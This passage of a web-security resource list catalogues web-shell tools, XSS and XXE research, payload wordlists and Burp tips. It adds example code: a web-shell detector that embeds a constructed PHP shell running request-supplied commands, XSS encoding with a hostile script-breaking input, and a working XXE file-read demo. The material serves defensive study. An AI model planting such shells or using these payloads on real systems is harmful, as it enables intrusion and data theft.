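Flips in the TLD label are not generated, since those land in a different registry's namespace and are handled (or not) at that level; the mitigations the talk discusses are about the traffic reaching these names, not the list itself.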
- Articles
- Detection
- Case Study: How Backdoors Bypass Security Solutions with Advanced Camouflage Techniques
- Look at PHP obfuscation methods for webshells
- NeoPI
- What is NeoPI? NeoPI is a Python script that uses a variety of statistical methods to detect obfuscated and encrypted content within text/script files. The intended purpose of NeoPI is to aid in the detection of hidden web shell code. The development focus of NeoPI was creating a tool that could be used in conjunction with other established detection methods such as Linux Malware Detect or traditional signature/keyword based searches.
- Shell Detector
- Shell Detector is an application that helps you find and identify PHP/CGI (Perl)/ASP/ASPX shells. Shell Detector has a “web shells” signature database that helps to identify web shells with up to 99% accuracy.
- Loki - Simple IOC Scanner
- Scanner for Simple Indicators of Compromise
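A first pass of the kind NeoPI and Shell Detector automate, as an added example (not their code): Shannon entropy of the longest whitespace-free token, plus a few obfuscation signatures, applied to two constructed PHP files. The thresholds are illustrative ranking cut-offs, not tuned values.

```python
"""Entropy + signature triage for PHP files (added example; constructed samples)."""
import base64
import math
import re
from collections import Counter

ENTROPY_THRESHOLD = 4.3      # bits/char: base64 blobs sit well above, PHP identifiers below
TOKEN_LENGTH_THRESHOLD = 64  # short tokens are never flagged on entropy alone

SIGNATURES = {
    "eval-of-decoded-blob": re.compile(
        r"\b(?:eval|assert)\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\("),
    "exec-of-request-param": re.compile(
        r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b"),
    "variable-function-on-request-param": re.compile(
        r"\$\w+\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b"),
}


def shannon_entropy(text: str) -> float:
    """Bits per character: 0 for one repeated symbol, up to log2(alphabet size)."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def longest_token(text: str) -> str:
    return max(text.split(), key=len, default="")


def analyze(source: str) -> dict:
    reasons = [name for name, rx in SIGNATURES.items() if rx.search(source)]
    token = longest_token(source)
    entropy = shannon_entropy(token)
    if len(token) >= TOKEN_LENGTH_THRESHOLD and entropy >= ENTROPY_THRESHOLD:
        reasons.append(f"high-entropy token ({len(token)} chars, {entropy:.2f} bits/char)")
    return {"longest_token": len(token), "token_entropy": round(entropy, 2),
            "reasons": reasons, "suspicious": bool(reasons)}


# Constructed samples: an ordinary page, and a dropper-style shell.
BENIGN = """<?php
require_once __DIR__ . '/config.php';
$stmt = $pdo->prepare('SELECT name FROM users WHERE id = ?');
$stmt->execute([(int) $_GET['id']]);
echo htmlspecialchars($stmt->fetchColumn(), ENT_QUOTES, 'UTF-8');
"""

_STAGE2 = (b"<?php if(isset($_POST['c'])){@system($_POST['c']);} else { echo md5('4a7f9e2c'); } "
           b"/* constructed payload, base64-wrapped as droppers do */")
WEBSHELL = f"""<?php
$k = 'x';
@eval(base64_decode('{base64.b64encode(_STAGE2).decode()}'));
$f = 'sys' . 'tem'; $f($_REQUEST['cmd']);
"""

if __name__ == "__main__":
    for label, src in (("benign", BENIGN), ("webshell", WEBSHELL)):
        print(label, analyze(src))
```

Entropy alone misses hex-encoded stages (16 symbols, at most 4 bits/char) and string-concatenated names such as `'sys' . 'tem'`, which is why the regexes catch the call shape (`$f($_REQUEST[...])`) rather than the function name, and why the real tools combine several metrics and rank rather than threshold.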
- Tools
- Weevely
- Weevely is a command line web shell dynamically extended over the network at runtime, used for remote administration and pen testing. It provides a weaponized telnet-like console through a PHP script running on the target, even in restricted environments. The low footprint agent and over 30 modules shape an extensible framework to administer, conduct a pen-test, post-exploit, and audit remote web accesses in order to escalate privileges and pivot deeper into internal networks.
- Getting Started
- b374k shell 3.2
- This PHP shell is a useful tool for a system or web administrator to do remote management without using cPanel, or connecting via SSH, FTP, etc. All actions take place within a web browser.
- Simple websockets based webshell
- JSShell
- An interactive multi-user web based JS shell written in Python with Flask (for server side) and of course Javascript and HTML (client side). It was initially created to debug remote esoteric browsers during tests and research. I'm aware of other purposes this tool might serve, use it at your own responsibility and risk.
- htshells
- Self contained web shells and other attacks via .htaccess files.
- Encoding Web Shells in PNG IDAT chunks - idontplaydarts.com
- novahot
- novahot is a webshell framework for penetration testers. It implements a JSON-based API that can communicate with trojans written in any language. By default, it ships with trojans written in PHP, Ruby, and Python. Beyond executing system commands, novahot is able to emulate interactive terminals, including mysql, sqlite3, and psql. It additionally implements "virtual commands" that make it possible to upload, download, edit, and view remote files locally using your preferred applications.
- 101
- Types of Cross-Site Scripting - OWASP
- Postcards from a Post-XSS World - Michael Zalewski
- This page is a rough collection of notes on some of the fundamental alternatives to direct script injection that would be available to attackers following the universal deployment of CSP or other security mechanisms designed to prevent the execution of unauthorized scripts. I hope to demonstrate that in many cases, the capabilities offered by these alternative methods are highly compatible with the goals of contemporary XSS attacks.
- Cross Site Scripting Prevention Cheat Sheet - OWASP
- CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests
- HTML Code Injection and Cross-site Scripting - Gunter Ollmann
- Flirting with MIME Types: A Browser’s Perspective - Blake Frantz
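What the OWASP prevention cheat sheet above comes down to, as an added example that is not OWASP's code: one encoder per output context (HTML body, quoted attribute, JavaScript string inside `<script>`, URL parameter) and a scheme allow-list for `href`, because no encoder makes a `javascript:` URL safe. The profile page and the hostile input are constructed.

```python
"""Context-specific output encoding for XSS prevention (added example)."""
import html
import json
from urllib.parse import quote, urlsplit


def for_html_body(value: str) -> str:
    """Text node between tags."""
    return html.escape(value, quote=True)


def for_html_attr(value: str) -> str:
    """Value of a double-quoted attribute (the caller supplies the quotes)."""
    return html.escape(value, quote=True)


def for_js_string(value: str) -> str:
    """A JavaScript string literal that stays inert inside an HTML <script>
    block. json.dumps escapes quotes, backslashes, control characters and,
    with ensure_ascii on, U+2028/U+2029; '<', '>' and '&' are escaped as well
    so the literal can never spell '</script>' or '<!--' for the HTML parser."""
    return (json.dumps(value)
            .replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026"))


def for_url_param(value: str) -> str:
    """One query-string value."""
    return quote(value, safe="")


def safe_href(url: str) -> str:
    """Encoding does not neutralise a dangerous scheme; allow-list instead."""
    url = url.strip()
    scheme = urlsplit(url).scheme
    if scheme in ("http", "https"):
        return url
    if scheme == "" and url.startswith("/") and not url.startswith("//"):
        return url                         # site-relative path; '//host' is excluded
    return "#"


def render_profile_naive(name: str, site: str) -> str:
    """Every interpolation here is an XSS sink."""
    return (f"<h1>{name}</h1>\n"
            f'<a href="{site}" title="{name}">site</a>\n'
            f'<script>var user = "{name}";</script>')


def render_profile(name: str, site: str) -> str:
    """Same page, each slot encoded for the context it lands in."""
    return (f"<h1>{for_html_body(name)}</h1>\n"
            f'<a href="{for_html_attr(safe_href(site))}" title="{for_html_attr(name)}">site</a>\n'
            f'<a href="/search?q={for_url_param(name)}">find</a>\n'
            f"<script>var user = {for_js_string(name)};</script>")


if __name__ == "__main__":
    # Constructed hostile input: closes the JS string, then the script block.
    hostile = '</script><script>alert(document.domain)</script>"; alert(1); //'
    print(render_profile(hostile, "javascript:alert(1)"))
```

`json.dumps` alone is not enough for the script context: it leaves `<` and `>` intact, so a value containing `</script>` ends the block as far as the HTML parser is concerned. The same gap applies to JSON data inlined into HTML, which is what the "improperly escaped JSON" writeups on this page are about.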
- Articles/Blogposts/Writeups
- Actual XSS in 2020 - Samuel Anttila(2020)
- Getting Real with XSS - Olive Simonnet(2019)
- XSS technique without parentheses - The Spanner
- Text/Plain Considered Harmful - Jan
- Setting The ‘REFERER’ Header Using Javascript - Drew Kirkpatrick(2020)
- Unleashing an Ultimate XSS Polyglot - Ahmed Elsobky
- Password stealing from HTTPS login page and CSRF protection bypass with reflected XSS - Michael Koczwara(2020)
- What is the use of CDATA inside JavaScript tags and HTML? - sptrac.com(2017)
- Detecting valid tags/events on XSS exploitation. - Jorge Lajara(2020)
- Presentations, Talks, Videos
- Self XSS: we’re not so different you and I - Mathias Karlsson
- Scriptless Attacks – Stealing the Pie Without Touching the Sill - Mario Heiderich, Marcus Niemietz, Felix Schuster, Thorsten Holz, Jörg Schwenk(CCS 2012)
- Due to their high practical impact, Cross-Site Scripting (XSS) attacks have attracted a lot of attention from the security community members. In the same way, a plethora of more or less effective defense techniques have been proposed, addressing the causes and effects of XSS vulnerabilities. As a result, an adversary often can no longer inject or even execute arbitrary scripting code in several real-life scenarios. In this paper, we examine the attack surface that remains after XSS and similar scripting attacks are supposedly mitigated by preventing an attacker from executing JavaScript code. We address the question of whether an attacker really needs JavaScript or similar functionality to perform attacks aiming for information theft. The surprising result is that an attacker can also abuse Cascading Style Sheets (CSS) in combination with other Web techniques like plain HTML, inactive SVG images or font files. Through several case studies, we introduce the so-called scriptless attacks and demonstrate that an adversary might not need to execute code to preserve his ability to extract sensitive information from well protected websites. More precisely, we show that an attacker can use seemingly benign features to build side channel attacks that measure and exfiltrate almost arbitrary data displayed on a given website. We conclude this paper with a discussion of potential mitigation techniques against this class of attacks. In addition, we have implemented a browser patch that enables a website to make a vital determination as to being loaded in a detached view or pop-up window. This approach proves useful for prevention of certain types of attacks we here discuss.
- "Gimme a bit!" - Exploring Attacks in the "Post-XSS" World - Takashi Yoneuchi
- Tricks For Weaponizing XSS - Drew Kirkpatrick
- Understanding XSS - Christina Mitchell(Nolacon2019)
- Come learn in depth about the web vulnerability XSS. First we discuss how browsers and web apps work to better understand how it's possible. Then we will cover the following: how to spot it in the wild, how to exploit it, remediation steps, and impact. How can I inject into your webpage? Come learn how!
- Popping Shells Instead OF Alert Boxes: Weaponizing XSS For Fun and Profit - Drew Kirkpatrick(2019)
- Bypass Techniques & Writeups
- Cheat-Sheets/References
- Filter Evasion
- XSS cheatsheet Esp: for filter evasion - RSnake
- Bypassing XSS Detection Mechanisms - Somdev Sangwan(2018)
- XSS Filter Evasion - Zbigniew Banach(2019)
- XSS without parentheses and semi-colons - Gareth Heyes(2019)
- Bypass XSS filters using JavaScript global variables - theMiddle
- Executing non-alphanumeric JavaScript without parenthesis - Gareth Heyes
- Non-alphanumeric code With JavaScript & PHP - Gareth Heyes
- CTF Challenge: INS Hack 2019 / Bypasses Everywhere - corb3nik
- JavaScript without parentheses using DOMMatrix - Gareth Heyes(2020)
- Arbitrary Parentheses-less XSS(against strict CSP policies) - terjang(2020)
- XSS: Arithmetic Operators & Optional Chaining To Bypass Filters & Sanitization - theMiddle(2020)
- Images
- Length
- Restricted Character Sets
- SVG
- Other
- Bypass XSS Protection with xmp, noscript, noframes.. etc.. - Hahwul
- MITM XSS Protection – Still Popping Alerts - doyler.net(2017)
- Attacking and defending JavaScript sandboxes - Gareth Heyes(2020)
- Evading defences using VueJS script gadgets - Gareth Heyes(2020)
- Escaping JavaScript sandboxes with parsing issues - Gareth Heyes(2020)
- Bypassing modern XSS mitigations with code-reuse attacks - Alexander Andersson(2020)
- Lists
- Cheat-Sheets
- Types-Of
- DOM-based
- 101
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- In the DOM - no one will hear you scream - Mario Heiderich(Garage4Hackers Ranchoddas Webcast2014)
- This talk is about the DOM and its more twilight areas. We'll see the weird parts and talk about where and why this might be security critical and affect your precious online applications, browser extensions or packaged apps. To understand the foundations of what the DOM has become by today, we'll further explore the historical parts - who created the DOM, what was the intention and how they fought dirty about it during the browser wars. Finally, we'll see a DOM based attack called "DOM Clobbering". An attack that is everything but obvious and affected a very popular and commonly used rich text editor. Be prepared for a lot of tech-talk as well as fear and loathing in the browser window. But don't shed no tears, there's a tool that fixes the security crazy for you and this talk will present it.
- Don't Trust The DOM: Bypassing XSS Mitigations Via Script Gadgets - Sebastian Lekies(AppSecEU2017)
- Over the years many techniques have been introduced to prevent or mitigate XSS. Most of these techniques, such as HTML sanitizers or CSP, focus on script tags and event handlers. In this talk, we present a novel Web hacking technique that enables an attacker to bypass these mitigations. In order to do so, the attacker abuses so-called script gadgets. A gadget is a legitimate piece of JS in a page that reads elements via selectors and processes them in a way that results in script execution. To abuse a gadget, the attacker injects benign elements that match the gadget’s selector. Subsequently, the gadget selects the elements and executes the attacker's scripts. As the attacker's markup is benign it passes HTML sanitizers and security policies. The XSS only surfaces when the gadget mistakenly elevates the privileges of the element. Based on real-world examples, we will demonstrate that these gadgets are present in almost all modern JavaScript libraries, APIs and applications.
- Breaking XSS Mitigations Via Script Gadgets - Sebastian Lekies, Krzysztof Kotowicz & Eduardo Vela(BHUSA2017)
- In this talk, we present a novel Web hacking technique that enables an attacker to circumvent most XSS mitigations. In order to do so, the attacker abuses so-called script gadgets. A script gadget is a legitimate piece of JavaScript in a page that reads elements from the DOM via selectors and processes them in a way that results in script execution.
- Eval Villain: Simplifying DOM XSS and JS Reversing - Dennis Goodlett(BSidesCLE2019)
- JavaScript cruft is growing faster than my ability to read. Since I can't read every line of code, I need tools to find important lines. Eval Villain is a web extension for Firefox that hooks native JavaScript functions before the page loads so that you will be notified every time a function is called. Eval Villain has discovered instances of DOM XSS that only appear in 1 of 100 page loads. It makes the reversing of malicious, second-stage encrypted JavaScript code trivial. I plan on walking through all the features of this tool using examples. To follow along, bring a computer that can run Firefox.
- https://www.irongeek.com/i.php?page=videos/bsidescleveland2019/bsides-cleveland-c-00-eval-villain-simplifying-dom-xss-and-js-reversing-dennis-goodlett
- Papers
- Tools
- Writeups(DOM XSS)
- $20000 Facebook DOM XSS - Vinoth Kumar(2020)
- INTIGRITI XSS CHALLENGE WRITE-UP - František Uhrecký(2019)
- The XSS challenge that +100k people saw but only 90 solved - Intigriti(2019)
- How our community hacked our own XSS challenge - Intigriti(2019)
- Intigriti Easter XSS Challenge Write-up - Abdullah Hussam(2020)
- Intigriti XSS Challenge Write-Up - Renaud Martinet(2019)
- Intigriti XSS Challenge #4 - PSPAUL(2019)
- Intigriti Easter XSS Challenge 2020 Write Up - lboynton.com(2020)
- Intigriti XSS Challenge – Fun with DOM XSS - doyler.net(2019)
- Solving Intigriti Challenge using… Content Injection! - Amal Murali(2020)
- Finally! HOW TO solve the INTIGRITI Easter XSS challenge using only Chrome DEVTOOLS! - ST0K
- Mutation XSS
- 101
- Articles/Blogposts/Writeups
- mXSS - TheSpanner(2014)
- Write-up of DOMPurify 2.0.0 bypass using mutation XSS - Michał Bentkowski(2019)
- Mutation XSS - Infinite8security(2016)
- Mutation XSS in Google Search - Tomasz Andrzej Nidecki(2019)
- Mutation XSS- A Unique class of XSS - Pankaj Rane(2019)
- Mutation XSS via namespace confusion – DOMPurify < 2.0.17 bypass - Michal Bentkowski (2020)
- Bypassing DOMPurify again with mutation XSS - Gareth Heyes(2020)
- Talks/Presentations/Videos
- Papers
- mXSS attacks: Attacking well-secured web-applications by using innerHTML mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius(2013)
- Back in 2007, Hasegawa discovered a novel Cross-Site Scripting (XSS) vector based on the mistreatment of the backtick character in a single browser implementation. This initially looked like an implementation error that could easily be fixed. Instead, as this paper shows, it was the first example of a new class of XSS vectors, the class of mutation-based XSS (mXSS) vectors, which may occur in innerHTML and related properties. mXSS affects all three major browser families: IE, Firefox, and Chrome. We were able to place stored mXSS vectors in high-profile applications like Yahoo! Mail, Rediff Mail, OpenExchange, Zimbra, Roundcube, and several commercial products. mXSS vectors bypassed widely deployed server-side XSS protection techniques (like HTML Purifier, kses, htmlLawed, Blueprint and Google Caja), client-side filters (XSS Auditor, IE XSS Filter), Web Application Firewall (WAF) systems, as well as Intrusion Detection and Intrusion Prevention Systems (IDS/IPS). We describe a scenario in which seemingly immune entities are being rendered prone to an attack based on the behavior of an involved party, in our case the browser. Moreover, it proves very difficult to mitigate these attacks: In browser implementations, mXSS is closely related to performance enhancements applied to the HTML code before rendering; in server side filters, strict filter rules would break many web applications since the mXSS vectors presented in this paper are harmless when sent to the browser. This paper introduces and discusses a set of seven different subclasses of mXSS attacks, among which only one was previously known. The work evaluates the attack surface, showcases examples of vulnerable high-profile applications, and provides a set of practicable and low-overhead solutions to defend against these kinds of attacks.
- Automation of Mutated Cross Site Scripting - Anchal Tiwari, J. Jeysree
- Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. In browsers, a mutation event occurs when there is a change in the DOM structure; there are various ways in which the DOM structure can be changed, among which the innerHTML property is discussed specifically. mXSS is a new class of XSS vectors, the class of mutation-based XSS (mXSS) vectors, which may occur in innerHTML and related properties. mXSS affects all three major browser families: IE, Firefox, and Chrome, and affects major web applications. In this paper we apply the idea of mutation-based testing to generate adequate test data sets for testing XSSVs. Our work addresses XSSVs related to web applications that use PHP and JavaScript code to generate dynamic HTML contents. Finally, we develop an automatic tool which generates mutants, tests the web application automatically, and reports the output.
- Persistent XSS
- 101
- Articles/Blogposts/Writeups
- General
- Blind
- File-Based
- Talks/Presentations/Videos
- Papers
- Reflected XSS
- 101
- Articles/Blogposts/Writeups
- Reflected XSS at Philips.com - Jonathan Bouman
- How I XSS’ed Uber and Bypassed CSP - Efkan(2018)
- admin.google.com Reflected Cross-Site Scripting (XSS) - Brett Buerhaus(2015)
- From Reflected XSS to Account Takeover — Showing XSS Impact - A Bug'z Life(2019)
- Reflected DOM XSS and CLICKJACKING on https://silvergoldbull.de/bt.html - Daniel Maksimovic(2018)
- Talks/Presentations/Videos
- Papers
- DOM-based
- JS Framework-Specific
- Angular
- React.js
- JSON Hijacking
- 101
- JSON Hijacking Demystified - Rohini Sulatycki(2012)
- Reflected XSS via JSON executed with Burp, but how to do it in realistic conditions? - StackOverflow
- XSS : Content-type: application/json - StackOverflow
- Is it possible to XSS exploit JSON responses with proper JavaScript string escaping - StackOverflow
- Articles/Blogposts/Writeups
- Story of a JSON XSS - Nikhil Mittal(2017)
- JSON hijacking for the modern web - Gareth Heyes(2020)
- Exploiting JSON Framework : 7 Attack Shots - Aditya K. Sood
- Attacking JSON Application : Pentesting JSON Application - Narendra Bhati(2018)
- Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities - Brett Buerhaus
- JSON based XSS - Koumudi Garikipati(2020)
- XSSing Google Code-in thanks to improperly escaped JSON data - Thomas Orlita
- 101
- Testing
- XSS Test String Dump
- HTML Purifier XSS Attacks Smoketest
- Cross-site scripting (XSS) cheat sheet - PortSwigger
- This cross-site scripting (XSS) cheat sheet contains many vectors that can help you bypass WAFs and filters. You can select vectors by the event, tag or browser and a proof of concept is included for every vector. This cheat sheet is regularly updated in 2019. Last updated: Fri, 08 Nov 2019
- Training
- XSS-Game.appspot
- Firing-Range
- Firing Range is a test bed for web application security scanners, providing synthetic, wide coverage for an array of vulnerabilities.
- XSSer
- prompt.ml - XSS Injection Game
- alert1 to win - XSS Injection Game
- Tools
- xsscrapy
- XSS Sniper
- Xenotix
- OWASP Xenotix XSS Exploit Framework is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework.
- xssValidator
- This is a burp intruder extender that is designed for automation and validation of XSS vulnerabilities.
- Shuriken
- Cross-Site Scripting (XSS) command line tool for testing lists of XSS payloads on web apps.
- XSStrike
- XSStrike is an advanced XSS detection and exploitation suite.
- iframeBusterXSS
- Check for known iframeBuster XSS
- XSS tag_event analyzer
- Script to test suitable XSS payloads when tags/events are validated in a weak way.
- Security Headers(scanner)
- Writeups
- Writing an XSS Worm
- XSS without HTML: Client-Side Template Injection with AngularJS
- XSS in AngularJS video series (walkthrough) - explaining some AngularJS sandbox bypasses, which resulted in the removal of the sandbox in 1.6
- Chaining Cache Poisoning To Stored XSS - Rohan Aggarwal
- Stealing JWTs in localStorage via XSS - David Roccasalva
- Penetration testing & window.opener — XSS vectors part 1 - Josh Graham
- Firefox uXSS and CSS XSS - leucosite.com
- Referer XSS with a Side of Link Injection - doyler.net
- XSS in steam react chat client - Zemmez
- Cerberus FTP Blind Cross-Site Scripting to remote code execution as SYSTEM (Version 9 and 10) - Kevin(secu.dk)
- Winning Intigriti's XSS Challenge - Ryan Wise
- iOS Bug Hunting – Web View XSS - Allyson O'Malley
- XSS in GMail’s AMP4Email via DOM Clobbering - Michal Bentkowski
- Auditing a Payment Processing of a Booking Framework - Jorge Lajara(2018)
- This article is thanks to the collaboration with Rayco Betancor and his crazy ideas and deep knowledge of how a Payment processing works, and a lot of trying different requests, forcing errors and trying harder.
- Sarahah XSS Exploitation Tool - Compromising Sarahah Users. - Shawar Khan
- A Questionable Journey From XSS to RCE - Dominik Penner(2019)
- Documenting the impossible: Unexploitable XSS labs - Gareth Heyes
- Art of bug bounty: a way from JS file analysis to XSS - Jakub Żoczek(2020)
- XSS a Paste Service - Pasteurize (web) Google CTF 2020 - LiveOVerflow(2020)
- URL validation bypass | Filedescriptor solves Intigriti's XSS challenge - Reconless(2020)
- Payloads
- Cross Site Scripting (XSS) Vulnerability Payload List
- Stealing HttpOnly Cookie via XSS - Yasser Gersy(2018)
- Tiny-XSS-Payloads
- A collection of tiny XSS Payloads that can be used in different contexts.
- 101
- XML Schema, DTD, and Entity Attacks: A Compendium of Known Techniques - Timothy D. Morgan, Omar Al Ibrahim(2014)
- DOS
- Articles/Papers/Talks/Writeups
- XXE Attack
- 101
- Articles/Papers/Talks/Writeups
- Hunting in the Dark - Blind XXE
- Exploiting Out Of Band XXE using internal network and php wrappers - Mahmoud Gamal
- Playing with Content-Type – XXE on JSON Endpoints - Antti Rantasaari(NetSPI, 2015)
- XXE: How to become a Jedi - Yaroslav Babin(Zeronights 2017)
- Advice From A Researcher: Hunting XXE For Fun and Profit
- Leading the Blind to Light! - A Chain to RCE
- Generic XXE Detection - Christian Schneider
- XXE OOB exploitation at Java 1.7+ - 2014
- Security of applications that parse XML (supplementary) - 2009
- Exploiting XXE In File Upload Functionality
- XML Parser Evaluation - web-in-security.blogspot.de
- Hiding in Plain Sight: XXE Vulnerability in HP Project & Portfolio Mgmt Center - Benjamin Caudill
- Don’t open that XML: XXE to RCE in XML plugins for VS Code, Eclipse, Theia, … - thezero
- Talks/Presentations/Videos
- Black Hat EU 2013 - XML Out-of-Band Data Retrieval
- What You Didn't Know About XML External Entities Attacks - Timothy D. Morgan
- Exploiting XXE Vulnerabilities In File Parsing Functionality - Willis Vandevanter - BHUSA 2015
- In this 25-minute briefing, we will discuss techniques for exploiting XXE vulnerabilities in File Parsing/Upload functionality. Specifically, XML Entity Attacks are well known, but their exploitation inside XML supported file formats such as docx, xlsx, pptx, and others are not. Discussing the technically relevant points step by step, we will use real world examples from products and recent bug bounties. Finally, in our experience, creating 'XXE backdoored' files can be a very slow process. We will introduce our battle tested tool for infecting the file formats discussed.
- FileCry - The New Age of XXE - BH USA 2015
- Papers
- CVEs
- Reference
- Tools
- XXEinjector
- XXEinjector automates retrieving files using direct and out of band methods. Directory listing only works in Java applications. Bruteforcing method needs to be used for other applications
- oxml_xxe
- This tool is meant to help test XXE vulnerabilities in file formats.
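In-band XXE as a runnable added example, not code from XXEinjector or oxml_xxe: Python's `xml.sax` with external general entities switched on (the default before Python 3.7.1) reads a constructed secret file through a `file://` entity, next to an expat-based parser that refuses any DTD. It assumes a POSIX path for the `file://` URL; the secret file, payload and element names are constructed.

```python
"""XXE file read against xml.sax, and a parser that refuses DTDs (added example)."""
import io
import os
import tempfile
import xml.sax
from xml.parsers import expat
from xml.sax.handler import ContentHandler, feature_external_ges


def write_secret(text: str) -> str:
    """Constructed stand-in for a file the attacker wants (think /etc/passwd)."""
    f = tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False)
    f.write(text)
    f.close()
    return f.name


def xxe_payload(path: str) -> str:
    """Classic in-band XXE: declare an entity backed by a file, then reference it."""
    return (f'<?xml version="1.0"?>'
            f'<!DOCTYPE order [ <!ENTITY xxe SYSTEM "file://{path}"> ]>'
            f'<order><note>&xxe;</note></order>')


class _Text(ContentHandler):
    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_vulnerable(doc: str) -> str:
    """xml.sax with external general entities enabled: the parser opens the
    file named in the entity and splices its contents into the document."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, True)    # the dangerous setting
    handler = _Text()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(doc.encode()))
    return "".join(handler.parts)


def parse_hardened(doc: str) -> str:
    """Expat directly, with no path to load entities: any DOCTYPE or entity
    declaration aborts the parse and external references are never followed
    (the same policy as defusedxml's forbid_dtd / forbid_entities)."""
    p = expat.ParserCreate()

    def refuse(*_):
        raise ValueError("DTD / entity declarations are not accepted")

    p.StartDoctypeDeclHandler = refuse
    p.EntityDeclHandler = refuse
    p.ExternalEntityRefHandler = lambda *_: 0        # 0 makes expat fail the reference
    parts = []
    p.CharacterDataHandler = parts.append
    p.Parse(doc.encode(), True)
    return "".join(parts)


def demo():
    """Return (text leaked through the vulnerable parser, whether the hardened one refused)."""
    path = write_secret("SECRET-FLAG-4242")
    try:
        leaked = parse_vulnerable(xxe_payload(path))
        try:
            parse_hardened(xxe_payload(path))
            refused = False
        except ValueError:
            refused = True
    finally:
        os.unlink(path)
    return leaked, refused


if __name__ == "__main__":
    leaked, refused = demo()
    print("vulnerable parser returned:", leaked)
    print("hardened parser refused the DTD:", refused)
```

The hardened variant rejects the whole DTD rather than just external entities, which also closes the internal-entity expansion (billion laughs) and parameter-entity out-of-band variants covered by the talks above; applications that genuinely need a DTD should use a library such as defusedxml rather than re-enabling pieces of this.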
- Miscellaneous
- Wordlists
- Lists
- jhaddix all.txt
- all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
- jhaddix content_discovery_all.txt
- a masterlist of content discovery URLs and files (used most commonly with gobuster)
- SecLists
- SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
- IntruderPayloads
- A collection of Burpsuite Intruder payloads, BurpBounty payloads (https://github.com/wagiro/BurpBounty), fuzz lists and pentesting methodologies.
- CommonSpeak2
- CWFF - Custom wordlists for fuzzing
- CWFF is a tool that creates a special high-quality fuzzing/content discovery wordlist for you at the highest speed possible using concurrency; it is heavily inspired by @tomnomnom's Who, What, Where, When, Wordlist.
- 1ndiList v 1.0
- Recon Custom WordList Generator
- Who, What, Where, When, Wordlist - TomNomNom
- OneListForAll
- Rockyou for web fuzzing
- Samlists
- "Free, libre, effective, and data-driven wordlists for all!"
- Payloads
- "Payload Arsenal for Penetration Testers and Bug Bounty Hunters"
- webapp-wordlists
- This repository contains wordlists for each version of common web applications and content management systems (CMS). Each version has a wordlist of all the files and directories shipped in that version.
- RFI/LFI Payload List
- all.txt - jhaddix
- "all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/"
- sql-injection-payload-list
- xxe-injection-payload-list
- Big List of Naughty Strings
- The Big List of Naughty Strings is an evolving list of strings which have a high probability of causing issues when used as user-input data. This is intended for use in helping both automated and manual QA testing; useful for whenever your QA engineer walks into a bar.
- subdirectories-discover
- "Perfect wordlist to discover directories and files on target site with tools like ffuf."
- wordlists - assetnote
- Automated & Manual Wordlists provided by Assetnote
- n0kovo subdomain wordlist
- A subdomain wordlist of 3,000,000 lines, crafted by harvesting SSL certs from the entire IPv4 space.
- Creation of
- Assetnote Wordlists
- "This website provides you with wordlists that are up to date and effective against the most popular technologies on the internet. Wordlists are generated on the 28th of each month, using Commonspeak2 and GitHub Actions. If there's an extension or technology that you would like a wordlist for, but it's not in the table below, send us a PR and it will be included on this page after the next run."
- Who, What, Where, When, Wordlist - @TomNomNom(NahamCon2020)
- Tutorials/Tips/Stuff
- 101
- Issue Definitions
- This listing contains the definitions of all issues that can be detected by Burp Scanner.
- Burp Suite Training - PortSwigger
- Articles/Blogposts/Writeups
- Various Burp Resources - agarri.fr
- Burp Pro : Real-life tips and tricks
- Behind enemy lines: Bug hunting with Burp Infiltrator
- Automating Web Apps Input fuzzing via Burp Macros
- Intro to Web App Security Testing: Logging - Aaron James(2020)
- "The Logger++ extension is a great tool for recording requests and responses across all of Burp Suite. However, it is important to ensure enough log entries are retained from the tools you expect and that logs are exported if you want to keep them (my preference is automatic export to CSV)."
- SSH "accept : too many open files" on OS X when using Burp - dewhurstsecurity.com(2013)
- Burp Suite Visual Aids - lanmaster53(2015)
- Brute Forcing with Burp - Pentesters Tips & Tricks Week 1 - securenetwork.com(2017)
- How to Burp Good - n00py(2017)
- Towards a Quieter Firefox - Brian King(2017)
- Quality of Life Tips and Tricks - Burp Suite - Parsia(2019)
- Using Burp’s session Handling Rules to insert authorization cookies into Intruder, Repeater and even sqlmap - NVISO(2019)
- Detecting and annoying Burp users - Julien Voisin(2021)
- Burp Automation | Automating Burp Scanning Via Rest API & Robot Framework Using Python3 - Divyanshu(2021)
- Proxy managed by enterprise? No problem! Abusing PAC and the registry to get burpin’ - Thomas Grimee(2021)
- Burp Suite: Match And Replace - thexssrat(2021)
- PimpMyBurp #1 – PwnFox + Autorize: The perfect combo to find IDOR - @adrien_jeanneau(2021)
- Automating Authorization Testing: AuthMatrix: Part 1 - Tib3rius(2021)
- Talks/Presentations/Videos
- OWASP Top 10: Hacking Web Applications with Burp Suite - Chad Furman
- Tactical Burp Suite: Next steps webcast - SecureIdeas(2020)
- Secure Ideas' Tactical Burp: Next Steps is a two-hour video exploring topics related to Burp Suite and its use in a web application penetration test. This course explores the various features of Burp Suite, focusing on how we use the system during our penetration testing.
- Burp Macro Auto Authentication - CyberSecurityTV(2020)
